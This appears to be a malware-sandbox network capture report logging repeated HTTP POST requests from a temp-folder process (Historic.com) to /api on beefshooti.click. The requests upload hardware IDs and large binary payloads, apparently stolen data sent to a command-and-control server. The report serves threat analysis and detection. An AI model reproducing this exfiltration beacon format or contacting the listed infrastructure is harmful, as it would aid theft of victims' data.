                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SePj7VVJyz5gtJG7zlZjVl1tc%2FQAvnFXItkveHo62rEntwsn3cAKbk0H7Sagy%2FuOxi7sVhmcDvNZSB4nEyG27g05Ffhf9adYsnMiZcndfqyaMsj%2BkBHqtUG7AcHoOvonElCE"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed1d9fffc8c11-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2021&rtt_var=761&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2842&recv_bytes=16028&delivery_rate=1434889&cwnd=203&unsent_bytes=0&cid=d3ada84eac15574d&ts=947&x=0"
                                                                                        2024-12-24 07:18:51 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-24 07:18:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.649829104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:18:53 UTC278OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=1K408MOPVWB9AS
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 19936
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:18:53 UTC15331OUTData Raw: 2d 2d 31 4b 34 30 38 4d 4f 50 56 57 42 39 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 46 38 46 33 33 45 41 31 36 44 46 46 44 34 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 31 4b 34 30 38 4d 4f 50 56 57 42 39 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 4b 34 30 38 4d 4f 50 56 57 42 39 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 34 0d 0a 2d 2d 31 4b 34 30 38 4d 4f 50 56 57 42
                                                                                        Data Ascii: --1K408MOPVWB9ASContent-Disposition: form-data; name="hwid"E3F8F33EA16DFFD400D57F9DDD37BE0C--1K408MOPVWB9ASContent-Disposition: form-data; name="pid"3--1K408MOPVWB9ASContent-Disposition: form-data; name="lid"jMw1IE--l4--1K408MOPVWB
                                                                                        2024-12-24 07:18:53 UTC4605OUTData Raw: 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                        2024-12-24 07:18:54 UTC1125INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:18:54 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=hu5kanpj0b7866ouka5i8jpq8j; expires=Sat, 19 Apr 2025 01:05:32 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4ptYgayJG0ozNKJCANK7FlO0G%2FpSxJg%2FfKCfSDpSdW5oQMc9cF65kV3oKKo1PR2ejOPHuIGe6OU6RGwiWegY4isDe8OKC6h8fEKtr4tiUa4V3KPCa2pzQlCPum40d%2BFdguum"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed1e7fe1d4315-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1696&rtt_var=654&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=20894&delivery_rate=1649717&cwnd=218&unsent_bytes=0&cid=acb3062881a0c0be&ts=945&x=0"
                                                                                        2024-12-24 07:18:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-24 07:18:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.649835104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:18:55 UTC272OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=US7WOO14D
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 5421
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:18:55 UTC5421OUTData Raw: 2d 2d 55 53 37 57 4f 4f 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 46 38 46 33 33 45 41 31 36 44 46 46 44 34 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 55 53 37 57 4f 4f 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 53 37 57 4f 4f 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 34 0d 0a 2d 2d 55 53 37 57 4f 4f 31 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                        Data Ascii: --US7WOO14DContent-Disposition: form-data; name="hwid"E3F8F33EA16DFFD400D57F9DDD37BE0C--US7WOO14DContent-Disposition: form-data; name="pid"1--US7WOO14DContent-Disposition: form-data; name="lid"jMw1IE--l4--US7WOO14DContent-Disposi
                                                                                        2024-12-24 07:18:56 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:18:56 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=sjtcij880p2kcfce010uerj5j8; expires=Sat, 19 Apr 2025 01:05:35 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSJXwIqQd0Bm%2FPlik43yUv9XqkfA0eBmcljTTSzmcW1gH36oHMeyiTMFrQq9jX9JRuhG2%2FnZzCX7u7cwyMgmGyKbnNwX79G74aiFAZWva%2FMy5%2BY5vCIDtqcK%2BKhfmKR5ymTu"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed1f719dc42e4-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1748&min_rtt=1744&rtt_var=663&sent=6&recv=11&lost=0&retrans=0&sent_bytes=2843&recv_bytes=6329&delivery_rate=1639528&cwnd=228&unsent_bytes=0&cid=722be406e8ba4a36&ts=758&x=0"
                                                                                        2024-12-24 07:18:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-24 07:18:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.649841104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:18:57 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=P8I4UTF54QOGS6JRI2
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1255
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:18:57 UTC1255OUTData Raw: 2d 2d 50 38 49 34 55 54 46 35 34 51 4f 47 53 36 4a 52 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 46 38 46 33 33 45 41 31 36 44 46 46 44 34 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 50 38 49 34 55 54 46 35 34 51 4f 47 53 36 4a 52 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 38 49 34 55 54 46 35 34 51 4f 47 53 36 4a 52 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 34 0d 0a 2d
                                                                                        Data Ascii: --P8I4UTF54QOGS6JRI2Content-Disposition: form-data; name="hwid"E3F8F33EA16DFFD400D57F9DDD37BE0C--P8I4UTF54QOGS6JRI2Content-Disposition: form-data; name="pid"1--P8I4UTF54QOGS6JRI2Content-Disposition: form-data; name="lid"jMw1IE--l4-
                                                                                        2024-12-24 07:18:58 UTC1123INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:18:58 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=scsaoqkgf3jad87dshjb4q6hpn; expires=Sat, 19 Apr 2025 01:05:37 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojfMslekXwCLVrJuaH1%2FmEhtYNkJaZus85FYrtxX43mfExb1UDANwbxpCNCsZqSTdjU6SPUccBrqdwZCYPAi44%2BqFC0ZrmypkJaGWcT%2BXZmgU2l5Iymt0bqSMTqOjxriRkla"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed203be07c341-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1506&rtt_var=585&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2172&delivery_rate=1938911&cwnd=177&unsent_bytes=0&cid=71cb5d5c6ca0c2e8&ts=1070&x=0"
                                                                                        2024-12-24 07:18:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-24 07:18:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.649847104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:19:00 UTC284OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=21CPJTJTVPRRPRWM8BU
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 578920
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: 2d 2d 32 31 43 50 4a 54 4a 54 56 50 52 52 50 52 57 4d 38 42 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 46 38 46 33 33 45 41 31 36 44 46 46 44 34 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 32 31 43 50 4a 54 4a 54 56 50 52 52 50 52 57 4d 38 42 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 31 43 50 4a 54 4a 54 56 50 52 52 50 52 57 4d 38 42 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 34
                                                                                        Data Ascii: --21CPJTJTVPRRPRWM8BUContent-Disposition: form-data; name="hwid"E3F8F33EA16DFFD400D57F9DDD37BE0C--21CPJTJTVPRRPRWM8BUContent-Disposition: form-data; name="pid"1--21CPJTJTVPRRPRWM8BUContent-Disposition: form-data; name="lid"jMw1IE--l4
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: b2 be f5 0b c5 94 fe 0f b4 c3 b5 60 e7 26 73 c1 b2 de 30 3a dc 03 c5 bc 31 b9 f2 ff bc 81 10 e2 5a e0 ec 50 1c 4d 1b d0 f8 51 b7 11 27 dd 73 0b a4 82 09 e1 55 e9 fd b1 c1 98 f0 ed 87 8f 89 2c d5 f5 af ce ba 98 59 ca d6 5f 11 77 78 c1 83 3a e6 75 d0 5e b1 35 7b 45 03 e8 cc b7 37 f3 ca 50 d3 a4 e6 ea 05 58 34 08 f3 68 ad 20 01 7a 35 a0 3a c1 ef 7e 61 15 f2 cf 6a 82 97 c6 84 74 b6 04 03 74 ee 53 5c 16 4d 33 bd 30 d3 9a fd f0 4f 5c 67 59 3e 16 d6 5b 32 2f 28 d9 93 fa df 2e fa ce cf 59 4a 8d ec 4c 19 69 35 88 15 93 bb b0 b6 7d 09 9b 30 e0 7f 0d 30 40 a4 04 b8 d2 de 9c 5b d0 8a ee 7c 08 77 f1 7f 3f 00 9e b9 09 31 17 28 5b ac af fa 63 af e6 98 bc 40 9a 24 e8 59 e3 be 4a e2 18 c9 ce be d3 ab fa 6c dc 24 77 94 77 b9 43 8b a6 07 89 c2 79 76 6e 9e 86 2a a3 b1 5f f0
                                                                                        Data Ascii: `&s0:1ZPMQ'sU,Y_wx:u^5{E7PX4h z5:~ajttS\M30O\gY>[2/(.YJLi5}00@[|w?1([c@$YJl$wwCyvn*_
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: a5 9a e3 13 8f e5 ae 87 70 59 8c 9b 44 84 ab 06 fd 8b 4a d9 b3 fc d9 c8 56 83 f4 9d 98 cd 7f 8d 0d b0 61 ea e4 5c 56 92 d3 96 76 9f d3 d9 f9 35 74 4b 76 70 5b eb bc a5 4b a6 1e c6 b7 36 1d 32 23 98 f5 64 3d 08 17 83 69 12 db 5d dd 0e ad 6b ce 75 31 0f 22 d5 c6 5e b5 52 1e 04 11 89 67 fb 3d 1d 15 14 27 8e 95 4b 2e f0 17 ef 48 69 4b a8 49 a2 03 ae 60 8c 69 a6 59 cd fb 0b a2 63 79 67 9c 38 04 a1 c5 2a 94 31 36 64 cb 1e 93 14 8f 76 13 26 cc 1f c8 3b f4 78 c6 54 4d 32 32 b4 14 ea 6d 25 76 c6 16 18 9f 94 5d 57 f1 26 a1 56 85 b9 67 7a f3 b4 44 91 f0 bf 8c 4b d8 94 5a ba 98 32 72 62 cb fd f2 6c ca 26 0b 77 ba 26 d8 5f e7 e6 a6 ea 29 43 02 34 d7 42 a9 c0 16 5d da 9e af ce ff 25 bf 93 f1 49 80 54 7e 16 63 66 fd fc 44 e2 ce e4 99 82 ca 6a cf cb f3 87 2b 56 b4 e7 1f
                                                                                        Data Ascii: pYDJVa\Vv5tKvp[K62#d=i]ku1"^Rg='K.HiKI`iYcyg8*16dv&;xTM22m%v]W&VgzDKZ2rbl&w&_)C4B]%IT~cfDj+V
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: 57 7f 16 a7 41 b9 14 7f c7 66 52 aa 8d 1b 24 dc ca e0 25 1e 8b fa 43 7b c2 8e 11 4b d4 2c d2 b8 b5 bf 83 d2 f1 46 bd 34 e0 69 a1 29 9a fa fb 35 c1 6a bd 7b 22 98 d1 e2 de 5b 82 d4 fc 99 2c f7 82 39 b6 4a 5b 3b ae eb f7 b0 6e 67 a7 c2 a8 1a ef c3 eb bd 1d 31 af b4 71 9b a2 8b 63 e1 5f dc 7e 2a f9 09 57 e9 d0 9f 5d f4 59 1a 0c 59 ff 82 41 21 82 d7 0d f2 5d 46 77 d0 be 5c a7 d8 ce 17 e4 8b 5d 8a f5 17 2e 92 58 a4 a4 b3 13 c7 9c 3e 48 07 e9 71 1b 9e 06 4e 1f e6 8d fd 92 f0 5c c8 eb 43 53 7f bd 0c 4d 4a b2 17 af 9c 32 0a 0d a1 07 dd 9f f2 c9 0a b4 5c 7a 52 3f 7b d5 a3 07 9f ca bb d8 df 76 57 50 93 b8 5d ce 5b b7 f2 4a a5 c9 1d a7 81 61 5e 7a 27 dd 82 17 a8 15 e5 4e bd e2 2e ce 67 2d d4 c4 b8 28 ca 97 c1 aa e4 b2 7d 3a 94 df 0a 26 0e 1c a3 bf 84 89 e7 af 59 0c
                                                                                        Data Ascii: WAfR$%C{K,F4i)5j{"[,9J[;ng1qc_~*W]YYA!]Fw\].X>HqN\CSMJ2\zR?{vWP][Ja^z'N.g-(}:&Y
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: f6 54 58 90 e1 15 be 46 3b 21 88 fa d0 c5 f5 aa ae fc 66 c1 af 0a c3 74 aa bf 0a 22 f3 4b c2 01 e2 8c db 51 3b 25 58 36 dc 44 75 99 07 fb 3d 55 14 34 72 3f 69 6b 42 72 ed a0 49 86 47 8e 62 df b9 c0 46 d1 8c a8 5a 34 d5 09 0b d4 46 04 9b b8 45 3e 5c f7 f6 ce 66 ce d4 3d fe 13 0d 1a 82 87 16 86 3e c2 58 4b 12 37 a9 5f 59 75 36 c1 3a b2 0b 61 3c c5 b7 1f 19 fe 00 37 f5 9c 1b 2a ec c9 d7 13 c2 cf 1e 9f 6c 93 a6 76 0d 1b 5c 5a 87 bc f7 64 d4 c6 fc ef 83 bf 49 d5 b0 32 6a 36 9c ee f0 02 19 e7 3d c5 2f 42 19 1b 63 fb e4 f6 8d 4e c3 7e c9 f9 e1 a7 47 4f 61 f8 07 60 6e d0 35 90 5e 1a e8 f4 c5 cf 06 81 ac d8 67 bd b3 ca 24 89 f5 df 3c 86 aa ed 80 38 fb ff 97 ae 59 05 10 49 c2 16 5e 55 0c 92 2a 89 b8 5b 9a 64 4e 5d 1c e5 2e 6b 8b b4 20 88 06 ec 04 1c 4e ed 36 4f 02
                                                                                        Data Ascii: TXF;!ft"KQ;%X6Du=U4r?ikBrIGbFZ4FE>\f=>XK7_Yu6:a<7*lv\ZdI2j6=/BcN~GOa`n5^g$<8YI^U*[dN].k N6O
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: 33 29 42 b6 cb 39 54 b9 12 23 0f 74 dc 5c 89 6a aa 80 b3 78 62 14 a5 3e f5 d4 68 51 57 f1 97 bd af 65 7e 7c 41 19 7b 63 b7 37 f6 ba 40 71 94 69 1d d1 1b d9 bd 22 42 22 a2 29 77 84 9f 1c 7d 36 a0 39 8e 6a f0 97 d2 32 42 0a 57 f3 1e b0 19 e5 fd 83 1f db 06 67 ba 73 1a a7 2f 0f 4a 78 2a 8f 2a 2c 58 66 25 8c ba 08 2e bf 6c bb d3 e1 b4 bf 7d b0 3b 53 4f 85 23 79 9d a5 fc 43 ce 97 79 22 a1 2b 12 f1 96 76 38 21 69 c4 fc 40 42 19 a2 c0 33 79 29 79 a9 4d 32 2a 9f a9 a9 a9 78 3a 65 ca ad 36 2f 46 99 ec c1 97 1d 45 34 da af 0d 74 f7 31 cb 93 8b 02 a0 5f fa 06 ae 0f a3 e1 f2 9e 10 1f c9 de 9c ff 74 e3 3c 9b 8a fc 36 bd 30 16 c7 a5 67 ff 38 77 92 65 98 7d 8e c1 38 b6 f0 d5 4c b4 31 e1 d8 f9 d6 12 96 24 69 98 95 ec 7d 53 93 c1 b8 be d8 8f ec 8d 36 5b 30 39 34 77 63 3a
                                                                                        Data Ascii: 3)B9T#t\jxb>hQWe~|A{c7@qi"B")w}69j2BWgs/Jx**,Xf%.l};SO#yCy"+v8!i@B3y)yM2*x:e6/FE4t1_t<60g8we}8L1$i}S6[094wc:
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: fb 62 fd 35 87 91 4b d1 00 f0 33 a7 66 c6 8c 37 a6 37 dc ce 61 db 7e 29 60 b3 53 fe 72 2d c3 96 28 48 17 5b 67 44 39 28 fe 7d 43 46 e7 6d 8d c3 be 2b 6e 35 33 b8 71 19 03 9c 9f 37 08 50 78 d7 cf 4f f8 61 ac 14 59 93 38 a3 c3 19 5f 20 d7 2f 2e 2a 7d 3e cc 17 32 ab c0 98 d5 60 9c 24 93 d7 38 9f c3 51 69 7f 8d 9e f5 f7 cd 8b 48 2b b6 52 a1 05 a8 1c b9 27 a8 7a f2 23 01 8c fc 5b 0e 64 d8 68 56 e7 15 91 40 9e 56 42 30 d8 26 9c f0 17 46 31 5f 94 ca 8e f5 7e 82 dc 96 e5 58 a1 0b 9f a9 9f 22 03 c6 0e 1c 6d 3d b4 d4 b1 e1 32 2b de 50 a5 c3 9e 19 34 95 fc 9b 36 da 13 be 38 3f fc 3b cf bb e6 71 f7 48 c0 3e c2 82 a8 d0 3e 6c 92 f8 5c ac 38 02 56 65 11 c0 e0 06 43 60 9e 68 b4 f9 72 83 eb df f8 ec cd 59 97 ae e1 0f 9e b6 61 5c 0e 7b be 86 b1 4a cc 3a cc d8 5c a5 94 66
                                                                                        Data Ascii: b5K3f77a~)`Sr-(H[gD9(}CFm+n53q7PxOaY8_ /.*}>2`$8QiH+R'z#[dhV@VB0&F1_~X"m=2+P468?;qH>>l\8VeC`hrYa\{J:\f
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: 09 ec 7d bd e2 85 6c 67 24 a3 8d 17 af 6e 7a 4f 50 cc e9 bd 0e 8d 64 16 e3 ce 3b f4 cd 0d 23 fa 56 95 2e 55 db bd bc 15 b1 22 8e 0b 3f f2 e6 2c 39 e5 2d 82 9a c0 db d7 53 ec 7f e0 ec 61 d0 c3 8d 28 9d 9b 0e 64 0d 5d e2 02 f6 0b 56 c7 c0 35 05 8a 8d 54 99 7d b6 c5 4b e5 b0 d1 df 49 21 87 24 41 00 57 c4 ee 49 58 52 9a 40 1e 02 ed 70 0d 67 8b 7e 0b 08 27 db bb cf 1e c9 ea f6 f6 0b fa 63 58 16 22 b8 38 7d 06 d6 68 60 e1 cf 0b be a4 82 f6 13 1b f7 d6 9d 6e 41 0b 17 11 3f 4f 1c 0a 0d dd cf 89 34 21 e6 2d 66 6a b7 c2 61 fd f6 f7 a8 03 08 d3 02 1b 6d 70 19 51 97 77 94 24 0d 08 72 59 08 da 8f b6 c1 3e 0f 04 57 dc be 4d b1 ae 03 88 04 b7 29 90 f0 9e e3 77 e4 0c 77 d7 e4 1c c7 e1 37 8e 1d 2e be c9 96 7e dc 38 7c 51 e2 db d4 b9 c0 2f ef 73 16 05 cc 1d 9a 24 a8 e8 3c
                                                                                        Data Ascii: }lg$nzOPd;#V.U"?,9-Sa(d]V5T}KI!$AWIXR@pg~'cX"8}h`nA?O4!-fjampQw$rY>WM)ww7.~8|Q/s$<
                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: 1f d9 1c f7 b4 99 a8 cb 5e d5 c7 44 9c a1 db be a2 b0 a7 42 ea e6 88 ad ec 51 15 52 9f 4c 82 02 f1 02 af 99 0a 48 a0 58 d3 9c 79 b6 7f 2c e5 02 eb 6e 00 86 59 17 36 73 bd 88 9e ec 4f 25 90 a0 ec a1 0e 57 a4 3a 5a 11 ab 9d 77 50 ae 17 7f 1a 60 6f c6 9a 39 3f 0e bc 89 4a f3 a4 a1 a2 de fc c4 79 42 5d 87 e8 fa ac 67 6d 3b 26 2b 6a 28 ac 05 86 10 21 8b 02 79 a4 94 f7 43 d2 02 5f f4 9c ec 37 9c 1f 1e 59 b7 26 60 7f f0 e7 ed b4 4b f1 a1 53 c9 c3 0d ae 7e a9 b4 e4 76 4e 2a 38 de fb 5d 08 df 18 fd 25 75 71 b8 99 e8 8f fd 43 e8 f4 61 72 cf 85 32 16 16 70 ef 10 60 43 a9 3e d1 88 b4 75 67 e5 44 66 dd 5a ac 6b d8 67 49 c4 1e 67 90 9c ef fc 56 a4 0a 86 f7 4f 20 cf eb 2e 5a f5 85 73 03 89 8d 4f 2f dc ad 25 e1 69 c4 01 61 d3 15 ef ff a0 6f af 39 52 23 52 df ec ae 9c 2e
                                                                                        Data Ascii: ^DBQRLHXy,nY6sO%W:ZwP`o9?JyB]gm;&+j(!yC_7Y&`KS~vN*8]%uqCar2p`C>ugDfZkgIgVO .ZsO/%iao9R#R.
